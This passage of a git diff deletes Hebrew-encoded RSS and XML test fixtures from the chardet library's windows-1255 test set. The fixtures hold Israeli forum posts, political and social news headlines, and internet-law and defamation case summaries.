target="_blank">http://www.karatsoft.co.il/site/NewsPage.asp?ID=6&amp;type=A</a><br> -שאמנם נכתב על גרסאות קודמות, אבל אני מניח שמדובר על פיצ'רים עקרוניים לגרסאות עבריות.</div>2005-12-29T18:15:00+02:00מישהו יודע מה ההבדל בין / ירדןירדןמישהו יודע מה ההבדל ביןhttp://www.exego.net/forums/showMessage.asp?i=16464<div dir="rtl" style="width:100%">גרסאות אקרובט ME לכאלו שאינן ME?<br> -למה לקנות את הגרסה המקומית?</div>2005-12-29T16:34:00+02:00שאלת השאלות / ירדןירדןכמה עלי לדרוש כמעצבת גוי?http://www.exego.net/forums/showMessage.asp?i=16463<div dir="rtl" style="width:100%">תחשבי כמה היית מקבלת קודם, כולל הטבות כמו פנסיה<br> -אם את עובדת רק על זה, תחשבי כמה שעות את משקיעה בזה, ותכפילי בעלות שעת עבודה.</div>2005-12-29T14:25:00+02:00כמה עלי לדרוש כמעצבת גוי? / לולילוליכמה עלי לדרוש כמעצבת גוי?http://www.exego.net/forums/showMessage.asp?i=16462<div dir="rtl" style="width:100%">עבור תוכנה, עד כה עבדתי כשכירה טעלי לתת הצעה כפרי לאנסרית. <br> -תודה</div>2005-12-29T09:18:00+02:00איך קוראים לסטודיו...? / amitay7amitay7איך קוראים לסטודיו...?http://www.exego.net/forums/showMessage.asp?i=16461<div dir="rtl" style="width:100%">ישנו סטודיו לעיצוב שמבוסס בניו יורק..<br> -הרבה פעמים הם קיבלו לינק בחדשות קונספציה, אחד הגדולים.<br> -<br> -מהעבודות שלהם אני זוכר רק את זה שהם עשו את הפתיח לתכנית<br> -MTV new (פתיח עם ילדים קטנים בין פרחים גדולים שנוגעים בקווים מפוקסלים - מי שראה בטוח זוכר).<br> -<br> -למישהו יש מושג איך קוראים להם?</div>2005-12-28T21:54:00+02:00 diff --git a/chardet/tests/windows-1255-hebrew/hagada.org.il.xml b/chardet/tests/windows-1255-hebrew/hagada.org.il.xml deleted file mode 100644 index c07c859..0000000 --- a/chardet/tests/windows-1255-hebrew/hagada.org.il.xml +++ /dev/null @@ -1,108 +0,0 @@ - - - - - - - -הגדה השמאלית -http://www.hagada.org.il -הגדה השמאלית -he - - -: 6/1 : הפגנות בבילעין ובעאבוד עם התגברות העניין התקשורתי -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4195 - - - - -: 8/1 : מפגש על הבחירות בישראל ובפלסטין במרכז לאינפורמציה אלטרנטיבית בירושלים -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4194 - - - - -הפילוג באיגודים המקצועיים האמריקאים -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4193 - - - - -: 7/1 : סיור לבילעין -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4192 - - - - -ניצחון לשובתי התחבורה הציבורית בניו-יורק -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4191 - - - - -ואולי לא -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4190 - - - - -על הכוונת: סוריה -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4189 - - - - -בטרם פורענות -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4188 - - - - -להוציא אל מחוץ לחוק את חברות הכוח-אדם -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4187 - - - - -התרגיל המסריח של אריק שרון -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4186 - - - - -בין מק''י ובין חד''ש -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4182 - - - - -סמרטוט אדום - הגנרלית של מרצ -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4181 - - - - -: 7/1 : שיקום כרמי זיתים בסאלם -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4180 - - - - -:: 12/1 :: תקציב 2006 והמלחמה בעוני -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4179 - - - - -חשיבותה של השותפות היהודית-ערבית -http://www.hagada.org.il/hagada/html/modules.php?name=News&file=article&sid=4177 - - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1255-hebrew/halemo.net.edoar.xml b/chardet/tests/windows-1255-hebrew/halemo.net.edoar.xml deleted file mode 100644 index 0aa10c8..0000000 --- a/chardet/tests/windows-1255-hebrew/halemo.net.edoar.xml +++ /dev/null @@ -1,338 +0,0 @@ - - - - - -HALEMO::דואר חשמלי -http://halemo.net/edoar/index.html - -דואר חשמלי, עיתון רשת למנויי דואר אלקטרוני - -he - - -eDoar::דואר חשמלי -http://halemo.net/edoar/images/edoar_rss.gif -http://halemo.net/edoar/index.html - - - - -2005-03-31T00:00:00+02:00 -המדריך לשבירת ראיות מודפסות מהאינטרנט -http://halemo.net/edoar/0077/0002.html - -האם תדפיס נייר של אתר אינטרנט שמוצג על מסך משתמש הוא העתק נאמן למקור של אתר האינטרנט? רבים יגידו שכן, ולפעמים גם בתי המשפט יצטרפו אליהם שיקבלו פלט מאתר אינטרנט כראיה קבילה. אבל, זה ממש לא כך. ויש אפילו הוכחה מדהימה. - - - - - -2004-12-19T00:00:00+02:00 -תמונות מיום עיון בנושא דואר זבל -http://halemo.net/info/spam/index.html - -ביום חמישי האחרון, 16 דצמבר 2004, נערך יום עיון בנושא דואר זבל. יום העיון נערך באוניברסיטת חיפה ואורגן על ידי המרכז למשפט וטכנולוגיה של הפקולטה למשפטים. מעט מתמונות שצולמו ביום העיון, כאן - - - - -2004-11-13T00:00:00+02:00 -דואר חשמלי: מניפסט פרידה עצבני -http://halemo.net/edoar/0076/0001.html - -זהו הגיליון האחרון של הניוזלטר "דואר חשמלי". דואר חשמלי ראה - אור במשך 76 גיליונות (כולל זה). גיליון מספר 1 של דואר חשמלי - יצא ביום 20 פברואר 2003 ונשלח לפחות מ 50 מנויים. גיליון מספר 76 זה יוצא - ביום 13 נובמבר 2004 ונשלח ליותר מ 1,000 מנויים. - - - - -2004-11-06T00:00:00+02:00 -נטוויז'ן תפצה שני תושבי קרית ארבע -http://halemo.net/edoar/0075/0002.html - -חברת נטוויז'ן, מפעילת אתר החדשות נענע, תשלם לכל אחד משני תושבי קרית ארבע, פיצוי על סך 10,000 ש"ח ועוד 1,000 ש"ח הוצאות בגין פרסום תמונתם לצד ידיעה על התנכלותם של מתנחלים כלפי תושבי חברון הערבים. - - - - -2004-11-06T00:00:00+02:00 -צעיר השמיץ חנות אופניים בפורום בתפוז וישלם פיצוי -http://halemo.net/edoar/0075/0003.html - -גולש צעיר בן 16 כתב ביקורת נוקבת על חנות אופניים בפורום אופניים באתר תפוז. בעל החנות ראה את הפרסום המשמיץ ותבע את הצעיר על לשון הרע בסכום של 100,000 ש"ח. לאחרונה הגיעו הצדדים לפשרה. הצעיר יתנצל בפורום וישלם לבעל החנות המושמץ 1,200 ש"ח. - - - - -2004-11-06T00:00:00+02:00 -חברת 012 קווי זהב תשלם הוצאות כספיות לאמיר גנס -http://halemo.net/edoar/0075/0003.html - -ספקית האינטרנט הישראלית 012 קווי זהב תבעה את אמיר גנס, מנהל חברת ניו אפרוצ' למשלוח דואר אלקטרוני פרסומי, דואר זבל בלשון העם. בתגובה, הגיש אמיר גנס תביעה שכנגד על לשון הרע נגד חברת 012 קווי זהב בגין פרסום מוקדם של כתב התביעה עוד לפני שהוגש לבית המשפט. ספקית האינטרנט ביקשה הבהרות לפני הגשת כתב הגנה שכנגד. בית המשפט דחה את בקשה והורה לה לשלם לגנס הוצאות בסך 1,000 ש"ח. - - - - -2004-11-06T00:00:00+02:00 -אינטרנט אקסטרה 75 -http://halemo.net/edoar/0075/0004.html - -אינטרנט פלילי: הורשע אדם שהפיץ וירוסים בדואר אלקטרוני. כתב אישום נגד אדם אחר החשוד בהפצת וירוסים. מעצר של צעיר החשוד בהפצת וירוסים וטוען כי מישהו מנסה להפליל אותו. אתר אינטרנט העלים תשעה מליון ש"ח ממס הכנסה. חבר כנסת חשוד בעבירות מחשב. ועוד קצת קישורים. - - - - -2004-11-06T00:00:00+02:00 -ניצחון פירוס -http://halemo.net/info/pirus/index.html - -עוד ניצחון כזה ואבדנו... מי היה פירוס ששמו מתקשר לניצחונות שהסבו למנצחיהן הפסדים כבדים ואבדות קשות? - - - - -2004-11-06T00:00:00+02:00 -יואב יצחק נגד הלמו: פסק הדין -http://halemo.net/versus/yoav/court20041028.html - -שופטת בית המשפט השלום בתל אביב, רות רונן, נתנה את פסק דינה בתיק יואב יצחק (תובע) נגד משה הלוי (נתבע). בפסק הדין היא חייבה את הנתבע לשלם לתובע סך של 10,000 ש"ח ועוד 7,500 ש"ח הוצאות, זאת לאחר שמצאה כי התובע לא נהנה משם טוב בהקשר של הפרסום המדובר וכי התובע הוא אדם פרובוקטיבי הנוהג לפרסם ביקורת קשה ובוטה על אישי ציבור בכלל ועל השופטת בייניש בפרט. - - - - -2004-11-06T00:00:00+02:00 -יואב יצחק נגד הלמו: פסק הדין -http://halemo.net/versus/yoav/court20041028.html - -שופטת בית המשפט השלום בתל אביב, רות רונן, נתנה את פסק דינה בתיק יואב יצחק (תובע) נגד משה הלוי (נתבע). בפסק הדין היא חייבה את הנתבע לשלם לתובע סך של 10,000 ש"ח ועוד 7,500 ש"ח הוצאות, זאת לאחר שמצאה כי התובע לא נהנה משם טוב בהקשר של הפרסום המדובר וכי התובע הוא אדם פרובוקטיבי הנוהג לפרסם ביקורת קשה ובוטה על אישי ציבור בכלל ועל השופטת בייניש בפרט. - - - - -2004-11-06T00:00:00+02:00 -מי פוחד מזעמו של שמעון פרס? חלק א -http://halemo.net/versus/yoav/court20041101.html - -עתונאי מסויים - - - - -2004-11-06T00:00:00+02:00 -מי פוחד מזעמו של שמעון פרס? חלק ב -http://halemo.net/versus/yoav/court20041103.html - -עתונאי מסויים - - - - -2004-10-29T00:00:00+02:00 -תגובות בארץ על תגובות הארץ -http://halemo.net/edoar/0074/0003.html - -השבוע הצטרף סופית עיתון הארץ ואתר האינטרנט שלו לאתרים המאפשרים לקוראים לכתוב תגובות מתחת לכתבות והמאמרים באתר. לא עוד אתר חדשות לאנשים שחושבים את עצמם, אלא אתר ככל האתרים בישראל. ביקשנו לשמוע תגובות של הציבור באינטרנט על מערכת התגובות החדשה באתר הארץ. - - - - -2004-10-29T00:00:00+02:00 -בית המשפט המחוזי הקל בעונשם של גולשים שאיימו על פורז -http://halemo.net/edoar/0074/0004.html - -בית המשפט המחוזי הקל בעונשם של אמיה ואביחי שוורצמן, אם ובנה, שאיימו על חבר הכנסת אברהם פורז בשנת 2002, עת כיהן כיושב ראש וועדת הכלכלה של הכנסת. חבר הכנסת פורז ביקש לבטל את הטבת החשמל חינם שמקבלים עובדי חברת חשמל. בתגובה, הוא קיבל איומים על חייו בטלפון ובפורום וואינט באינטרנט. - - - - -2004-10-29T00:00:00+02:00 -כנס y2hack4 -http://halemo.net/versus/yoav/court20041025.html - -סיכומי תשובה בכתב שנכתבו והוגשו לבית המשפט השלום בתל אביב על ידי עו"ד אביב אילון (משרד עוה"ד אילון אגרט ושות'), בא כוח הנתבע. מי מתחזה לעורך דין? מי המציא את האנונימיות באינטרנט? ועוד... - - - - -2004-10-29T00:00:00+02:00 -יואב יצחק נגד הלמו: סיכומי תשובה בכתב מטעם הנתבע -http://y2hack4.org - -הכנס ביום 16 בנובמבר 2004, שעה 18:00. מועדון ה TLV. תל אביב, ישראל - - - - -2004-10-29T00:00:00+02:00 -חדר הסאטירה: ערפאתונאוט -http://halemo.net/satiroom/images9/arafatonaut.html - -לפני עזיבתו את המוקטעה לכיוון גן עדן, הצטלם הראיס יאסר ערפאת בחליפת חלל מתאימה. תוכנית החלל הפלסטינית עם האסטרונאוט הפלסטיני הראשון המריאה לצרפת... - - - - -2004-10-27T00:00:00+02:00 -האינטרנט בלי יצחק רבין -http://halemo.net/edoar/0074/0002.html - -השבוע, לקראת יום השנה לרצח יצחק רבין, ביקשנו לבדוק כיצד הייתה נראית רשת - האינטרנט אם יצחק רבין היה חי. כיצד לכתו בטרם עת של המנהיג - האהוב השפיעה לרעה על רשת האינטרנט ועל ציבור הגולשים. האם -יצחק רבין הבין ואהב מחשבים? האם זכה בחייו לגלוש ברשת האינטרנט? - - - - -2004-10-23T00:00:00+02:00 -אינטרנט אקסטרה 73 -http://halemo.net/edoar/0073/0002.html - -משפחת אברהם הגישה בקשה לפטור מאגרת בית משפט; מי זה פה שמעיז ספר בדיחות על ערבים; חברת 012 קווי זהב הגישה כתב תשובה נגד אמיר גנס. - - - - -2004-10-23T00:00:00+02:00 -הורשע צעיר שהציף שרתי מחשב וגרם לקריסתם -http://halemo.net/edoar/0073/0003.html - -במחצית השנייה של שנת 2000 התחוללה מלחמה ברשת הצ'אטים של האינטרנט. רשת הצ'אטים הנקראת גם רשת איי אר סי, היא רשת המאפשרת ניהול שיחות בין משתמשים ברחבי העולם בעזרת תוכנה ופרוטוקולים ייעודיים. לאחר תלונות של חברת דל נט שסבלה מהצפות של ישראלים על שרתיה, היא פנתה למשטרת ישראל. החודש הורשע הצעיר שכתב את הסקריפטים והוביל את המתקפות המקוונות. - - - - -2004-10-23T00:00:00+02:00 -יואב יצחק נגד הלמו: כתבי בי דין רוטר -http://halemo.net/versus/yoav/court20041010.html - -לאתר עלו כל המסמכים שהוגשו לבית המשפט וניתנו על ידי בית המשפט בתיק התביעה יואב יצחק נגד ישעיהו ונעם רוטר. מכתב התביעה ועד להסכם הגישור וההתנצלות. - - - - -2004-10-16T00:00:00+02:00 -אצבע משולשת לחברות כרטיסי האשראי -http://halemo.net/edoar/0072/0004.html - -החלום הרטוב של חברות התקליטים זה שכולנו נשלם על כל שיר שאנחנו מורידים מרשת האינטרנט. אתרי מוסיקה חוקיים קמים ברשת, אבל לא כולם יכולים לשלם על זה. כל עוד רשת האינטרנט לא תאפשר קנייה באמצעי תשלום חופשיים, נמשיך לגנוב שירים. - - - - -2004-10-16T00:00:00+02:00 -יואב יצחק נגד הלמו: סיכומים מטעם התובע -http://halemo.net/versus/yoav/court20041010.html - -ביום 10 אוקטובר 2004 הוגשו סיכומים בכתב לבית המשפט מטעם יואב יצחק. בסיכומיו מסביר התובע ובא כוחו על הסכנות ברשת האינטרנט, על הסכנות באנונימיות בו, על תסכוליו של הלמו, על צדיקותו הגדולה של התובע, וגם הסברים מדוע בית המשפט צריך לשפוט לחומרה את הלמו שכינה את צה"ל ואת המשטרה בכינויים לא יפים כל כך באתר האינטרנט שלו... - - - - -2004-10-12T00:00:00+02:00 -לראשונה: ייאכף פסק דין אמריקאי נגד אתר אינטרנט ישראלי -http://halemo.net/edoar/0072/0002.html - -אתר אינטרנט ישראלי מכר מוצרים המיוצרים בישראל לאזרחים ברחבי העולם. האתר ששוכן על השרתים של חברת בזק בינלאומי בפתח תקווה היה כתוב באנגלית ואיפשר גם לאזרחי אמריקה לקנות. באתר נמכרו מוצרי קוסמטיקה של מעבדות ים המלח שהזיכיון למכירתם בארה"ב היה בלעדי לזכיינית מקומית. החברה מאמריקה לא אהבה את זה, תבעה בארה"ב וקיבלה פסק דין בהעדר הגנה. השבוע פסק הדין המרוחק נאכף בישראל. הסמכות המקומית הבינלאומית של האינטרנט עשתה עלייה לישראל. - - - - -2004-10-12T00:00:00+02:00 -נדחתה תביעת אובייקטיבי נגד חברת קו מחשבה -http://halemo.net/edoar/0072/0003.html - -בשנת 2003 תבעה חברת אובייקטיבי תבעה את חברת קו מחשבה על לשון הרע. השבוע נזרקה תביעתה ממדרגות בית המשפט השלום בתל אביב לאחר שלא טרחה להתייצב לדיונים. אובייקטיבי שמה קצוץ על בית המשפט. - - - - -2004-10-09T00:00:00+02:00 -חובבנות משפטית אובייקטיבית -http://halemo.net/edoar/0071/0003.html - -השבוע נשבר שיא משפטי בעולם הצרכנות: חברת אובייקטיבי מבית עד ז'ורבין קבעה שיא אישי כאשר עתירה שלה לבית המשפט הגבוה לצדק הושלכה פעמיים ברציפות ממדרגות בית המשפט ושלחה את הנשיא שלה לחפש ריגושים משפטיים במקום אחר. החברה ניסתה לעתור נגד חברת דרך ארץ ורק חובבנות משפטית מנעה זאת ממנה. - - - - -2004-10-09T00:00:00+02:00 -פורסמו המלצות הוועדה לבדיקת הבעיות המשפטיות באינטרנט -http://halemo.net/edoar/0071/0004.html - -השבוע פרסם משרד המשפטים באופן רשמי את דו"ח הוועדה שבדקה את הסוגיות המשפטיות ברשת האינטרנט מול החקיקה הקיימת בישראל. הוועדה שהוקמה בשנת 1999 פרסמה כבר בחודש מאי 2004 את טיוטת הדו"ח, אך רק השבוע פורסמו יותר מ 150 עמודים של מסקנות הוועדה לבדיקת נושא הסחר האלקטרוני באינטרנט בישראל. - - - - -2004-10-09T00:00:00+02:00 -למה באינטרנט מותר ובתקשורת אסור? -http://halemo.net/edoar/0071/0005.html - -חברת רשת, אחת מזכייניות ערוץ 2, תקרין בקרוב סרט המנסה לחושף את מעלליו של אלחנן טננבוים, שנחטף באוקטובר 2000 על ידי ארגון החיזבאללה הלבנוני, והוחזר לארץ רק בינואר 2004 ביחד עם שלושת גופות החיילים החטופים. בעבר פנתה חברת רשת לבית המשפט והלינה על הפרסומים ברשת האינטרנט בנוגע לטננבוים. רשת ביקשה להסיר את צו איסור הפרסום. בית המשפט קבע כי הפרסום באינטרנט אינו עילה מספקת כדי להסיר את צו איסור הפרסום, וכי מדובר בשמועות לא מבוססות ופטפטת מיותרת. - - - - -2004-10-067T00:00:00+02:00 -חדר הסאטירה: אלונקה קרבית -http://halemo.net/satiroom/images9/unstretcher.html - -מדינת ישראל מאשימה את ארגון אונרא של אומות המאוחדות כי הוא מעביר באמבולנסים שלו אמצעי לחימה ובהם משגרי רקטות קסאם. אונרא והאו"ם מכחישים וטוענים כי מדובר באולנקות בלבד. צלמינו סולמאן אשפ"י בעזה מביא צילום בלעדי של אלונקה חשודה שהיא אמצעי לחימה. - - - - -2004-10-04T00:00:00+02:00 -מותה של שמועה מקוונת ולידתה של תביעה מכוונת -http://halemo.net/edoar/0071/0002.html - -בחודש אוקטובר 2000 נחטפו ללבנון על ידי ארגון החיזבאללה שלושה חיילים, בהם גם בני אברהם ז"ל. לאחר החטיפה, נפוצו שמועות ברשת האינטרנט כי החיילים היו מעורבים בעסקת סמים. משפחת אברהם מייחסת את הפרסום לרמי יצהר. ביום 28 ספטמבר 2004 הגישה המשפחה לבית המשפט המחוזי בתל אביב תביעת לשון הרע נגד יצהר ונגד חברת אינטרנט זהב שבה מתארח האתר של יצהר, עניין מרכזי. סכום התביעה: שלושה מליון ש"ח. - - - - -2004-09-30T00:00:00+02:00 -RSS::ערוצי מידע חדשים של דיני רשת -http://www.netlaw.co.il/Rsshe.asp - -אתר דיני רשת מעלה ערוצי מידע חדשים לשימוש בתוכנות RSS. - - - - -2004-09-30T00:00:00+02:00 -אמיר גנס תובע בחזרה את 012 קווי זהב על לשון הרע -http://halemo.net/edoar/0070/0002.html - -ספקית האינטרנט הישראלית 012 קווי זהב תבעה את אמיר גנס, מנהל חברת ניו אפרוצ' למשלוח דואר אלקטרוני פרסומי, דואר זבל בלשון העם. כתב התביעה פירט עוולות שונות, חלקן אזרחיות חלקן פליליות. השבוע הגיש אמיר גנס את כתב ההגנה שלו וכן תביעה שכנגד על לשון הרע נגד חברת 012 קווי זהב בגין פרסום מוקדם של כתב התביעה עוד לפני שהוגש לבית המשפט. - - - - -2004-09-30T00:00:00+02:00 -הוגשו כתב הגנה ותביעה שכנגד בריב הטייסים -http://halemo.net/edoar/0070/0003.html - -שני גולשים, שניהם טייסים, החליפו דין ודברים בפורום "תעופה קלה" באתר תפוז. לאחר תקופה של כשלושה חודשים של ספיגת עלבונות החליט ברוך ירושלמי לתבוע את עלבונו בבית המשפט השלום בתל אביב. הלה תבע את אבי בן דוד על לשון הרע בסכום של מאה אלף ש"ח. לאחר זמן מה הוגש כתב הגנה בתיק. בן דוד אף הגיש תביעה שכנגד, נגד ירושלמי. יהיה מעניין. - - - - -2004-09-30T00:00:00+02:00 -אינטרנט אקסטרה 70 -http://halemo.net/edoar/0070/0004.html - -רמי יצהר נתבע על לשון הרע על ידי משפחת החייל החטוף בני אברהם ז"ל, למה אורן לוי יפסיד את הדומיין לחברת מיקרוסופט ומי הבחורה שתפיל אתכם ואת תוכנות חברת מיקרוסופט. - - - - - - diff --git a/chardet/tests/windows-1255-hebrew/hevra.org.il.xml b/chardet/tests/windows-1255-hebrew/hevra.org.il.xml deleted file mode 100644 index f41804d..0000000 --- a/chardet/tests/windows-1255-hebrew/hevra.org.il.xml +++ /dev/null @@ -1,68 +0,0 @@ - - - - - - - -חברה צודקת -http://www.hevra.org.il -חברה צודקת היא תנועת אזרחים ששמה לה למטרה להחזיר את רווחת התושבים בישראל למוקד סדר היום הכלכלי-חברתי -he-il - - -יש סטודנטים שמעדיפים לשכב מול טרקטורים במקום על הדשא בקמפוס / צפריר רינת -http://www.hevra.org.il/modules.php?name=News&file=article&sid=840 - - - -חולים בלי תרופות / שלומית אבני -http://www.hevra.org.il/modules.php?name=News&file=article&sid=839 - - - -בדרך של הפרוטסטנטיות / יהודה בר שלום -http://www.hevra.org.il/modules.php?name=News&file=article&sid=838 - - - -סוכריה מצונזרת / יובל דרור -http://www.hevra.org.il/modules.php?name=News&file=article&sid=836 - - - -השמועות על מות הסוציאליזם הן מוקדמות / אבי גרפינקל -http://www.hevra.org.il/modules.php?name=News&file=article&sid=835 - - - -המקצוע היגע הזה / יוסי שריד -http://www.hevra.org.il/modules.php?name=News&file=article&sid=834 - - - -למה חמש? שתיים / מוטי נצר -http://www.hevra.org.il/modules.php?name=News&file=article&sid=833 - - - -משרדי הממשלה מנסים לחסוך בכל מחיר, ועובדי הקבלן מקבלים מתחת לשכר מינימום / רותי -http://www.hevra.org.il/modules.php?name=News&file=article&sid=832 - - - -הבריאות כמנוע חברתי / זאב וורמברנד -http://www.hevra.org.il/modules.php?name=News&file=article&sid=831 - - - -חזית סטודנטיאלית חברתית -http://www.hevra.org.il/modules.php?name=News&file=article&sid=830 - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1255-hebrew/hydepark.hevre.co.il.7957.xml b/chardet/tests/windows-1255-hebrew/hydepark.hevre.co.il.7957.xml deleted file mode 100644 index 249065f..0000000 --- a/chardet/tests/windows-1255-hebrew/hydepark.hevre.co.il.7957.xml +++ /dev/null @@ -1,9 +0,0 @@ - - -חדשות אנש http://hydepark.co.il/hydepark/forum.asp?forum_id=7957הייד פארק - מרכז פורומים ישראליheהייד פארק - מרכז פורומים ישראליhttp://www.hydepark.co.il/hydepark/header_graphics/logon1.jpghttp://hydepark.co.ilWed, 4 Jan 2006 19:56 +0200שיינע אינטרעסאנטע לינקס 19:56jewboyWed, 4 Jan 2006 19:56 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=744992
    http://www.fungrams.com/network/haha.shtml]]>
    Wed, 4 Jan 2006 19:52 +0200כינעזשער מאכלים װייסט איינער ? 19:52verrveistWed, 4 Jan 2006 19:52 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747772ישר כח ]]>Wed, 4 Jan 2006 19:48 +0200א חנוכה מיט ר' חיים פון ירושלים 19:48jewboyWed, 4 Jan 2006 19:48 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1736612פרטים בע"ה.]]>Wed, 4 Jan 2006 19:45 +0200Who places stickers on cars 19:45bush2008Wed, 4 Jan 2006 19:45 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1746139To me it sounds like groups of mafia I cant believe that it was really the sanitation dept
    The man who placed it on my window should go to jail In my opinion


    תוקן על ידי - bush2008 - 03/01/2006 7:21:07]]>
    Wed, 4 Jan 2006 19:26 +0200אן עקסידענט וואס האט פאסירט אין 2006?? 19:26קנישעסWed, 4 Jan 2006 19:26 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747815
    Horse pulling carriage goes wild in Manhattan, crashes into car

    By ELIZABETH LeSURE
    Associated Press Writer

    January 2, 2006, 11:50 PM EST

    NEW YORK -- The driver of a horse-drawn carriage was thrown into the street Monday night when the animal suddenly bolted, galloped for blocks and then crashed into a station wagon in midtown Manhattan, witnesses said.

    "It was horrifying," said Robyn Hussa, who saw the horse racing through traffic. "It was like a nightmare."

    The horse, whose carriage had no passengers, smashed into the station wagon at 50th Street and Ninth Avenue around 9:30 p.m., fire department Chief Jim Hodgens said. Two men in the station wagon were injured, he said.

    The street was soaked in blood by the time the carriage driver was taken away in an ambulance, witnesses said.

    "He wasn't moving at all, and there was blood all over the place," said Philip Emran, who had been eating dinner at a restaurant on the corner.

    He said the horse was wrapped around the station wagon, its rear legs on top of it and its head on the ground. The windshield of the car was smashed, and the four-wheel carriage was mangled.

    The horse, which remarkably appeared to escape injury, later stood at the scene before being driven away while bucking and kicking in a police wagon.

    Authorities at the scene didn't immediately know the conditions of the injured or the origin of the horse and carriage, which had heart-shaped cutouts for windows.

    Jasna Tomasevic, visiting from Orlando, Fla., said she was so horrified by what she witnessed through the window while dining at the corner restaurant that she had to change seats.

    "This is really not something which I want to see," she said.

    Manhattan carriage rides, generally in and around Central Park, are popular with tourists year-round and have been featured in movies and shows such as HBO's "Sex and the City." Carriages line up along Central Park South, about 10 blocks from where Monday's crash occurred, offering 30-minute rides for about $40.

    לינק פאר בילדער

    http://www.nynewsday.com/news/local/wire/nyc-horsecrash-pg,0,7830132.photogallery]]>
    Wed, 4 Jan 2006 18:47 +0200גיין מיט די פיס - נפלאות הבורא. 18:47פשטידאWed, 4 Jan 2006 18:47 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747486
    לויט ווי זיי האבן באטראכט פוס-גייער, לייגט א מענטש נישט אראפ זיין פוס, איידער זיינע אויגן געבן דעם מעסעדזש פאר'ן מח, און דער מח צו די פיס. נאר אזוי גייט א מענטש.



    The Surprising Complexity of Walking

    Next time someone tells you to watch your step, tell them you already are.

    Placing your foot down when walking was thought to be a predetermined process: lift foot, decide where to put it based on what's on the ground, and if nothing moves, land it down on the original target. Scientists thought this procedure requires no immediate visual information once the foot was lifted off the ground.

    But a new study has found that continuous visual guidance mechanisms may be needed for accurate foot placement.

    "We have demonstrated that vision can be used in an online fashion to fine-tune foot placement during a step," said Raymond Reynolds, of the Institute of Neurology, Queen Square, London. "It was previously thought that vision was used to plan the step in advance but not necessarily monitor its ongoing progress."

    Reynolds and colleagues looked at how well people placed their feet onto a target in the process of walking. In half of their tests, they blocked off the subjects' vision as they were lifting their feet off of the ground. This caused them problems in placing their foot accurately on the target. When vision was restored, foot placement was once again on the mark.

    "We observed that when vision was restored, corrective adjustments were made as the foot came close to the target," Reynolds told LiveScience.

    The possible consequence of a misstep is, of course, a fall. The scientists hope that by learning how basic walking is controlled, they can better understand what goes wrong in people.

    "It is important to know how healthy people control foot placement, so that we may understand what goes wrong in people who have neurological disorders which may cause them to fall," Reynolds said.

    The researchers are now working on determining the extent to which one can alter foot placement during a step, which may have relevance for obstacle avoidance, Reynolds explained.

    The study was detailed in the December issue of the Journal of Physiology.

    http://news.yahoo.com/s/space/20060103/sc_space/thesurprisingcomplexityofwalking;_ylt=ApvQPuGe6PWKa4rmysgpx4dxieAA;_ylu=X3oDMTA4NmhocGZ1BHNlYwMxNzAw

    ]]>
    Wed, 4 Jan 2006 18:43 +0200Shmilowitz Bakery Settles With Labor D 18:43ShamosWed, 4 Jan 2006 18:43 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1748613Shmilowitz Bakery Settles With Labor
    Department Action

    Williamsburg - Smilowitz Bakery has agreed to pay employees $120,651 in overtime back wages to settle a U.S. Department of Labor lawsuit alleging violations of the federal Fair Labor Standards Act(FLSA).

    http://vosizneias.blogspot.com/2006/01/williamsburg-smilowitz-bakery-to-pay.html

    ]]>
    Wed, 4 Jan 2006 18:37 +0200די בעסטע וועג צו פרינטן גרעפיק פון קארעל 18:37נבוכדנאצרWed, 4 Jan 2006 18:37 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747756Wed, 4 Jan 2006 18:33 +0200Halp- איך האב באקימן א 3טע דוזשרי בריוו 18:33אלעסאמתWed, 4 Jan 2006 18:33 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747558Wed, 4 Jan 2006 17:47 +0200א GOOGLE קאמפיוטער. ביליג און גוט. 17:47פשטידאWed, 4 Jan 2006 17:47 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1746839
    GOOGLE ארבעט מיט וואל מארט צו איבערנעמען די קאמפיוטער אינדוסטרי.


    http://www.latimes.com/business/la-fi-predict1jan01,0,3503327.story]]>
    Wed, 4 Jan 2006 17:01 +0200א קאפל אדער בעיסבאלל קעפ ביים געים 17:01חייםמרדכיWed, 4 Jan 2006 17:01 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747379
    By Craig Smith

    Seattle Times staff reporter

    Q: Do boys on the Northwest Yeshiva basketball team wear the traditional Jewish hat, the yarmulke, during games?

    A: Yes. It's a rule at the Mercer Island school.

    Athletic director Jed Davis said the feeling is they are representing an Orthodox Jewish school so customs will be followed.

    Yarmulkes are small, thin skullcaps. Most players use an athletic headband to keep them on the back of their heads, but metal clips are allowed under an exception to national high-school rules. However, headbands are more popular because clips sometimes come off during games at inopportune times, Davis said.

    The girls basketball team at the school is noteworthy because some girls, for modesty reasons tied to religion, choose to play in skirts.

    Northwest Yeshiva is a Class B school and one of its top boy players, Golan Silverman, a 6-foot-3 junior, was the Seattle Times' boy athlete of the week in early December. He earned the award during a week in which he scored 87 points, grabbed 73 rebounds and shot 85 percent from the field in a three-game stretch.

    באמת איך פארשטיי נישט קאן סאך צי די זאכן, אבער איך בין זיכער אז מען קען האבן ביידע א קאפל מיט בעיסבאלל קעפ

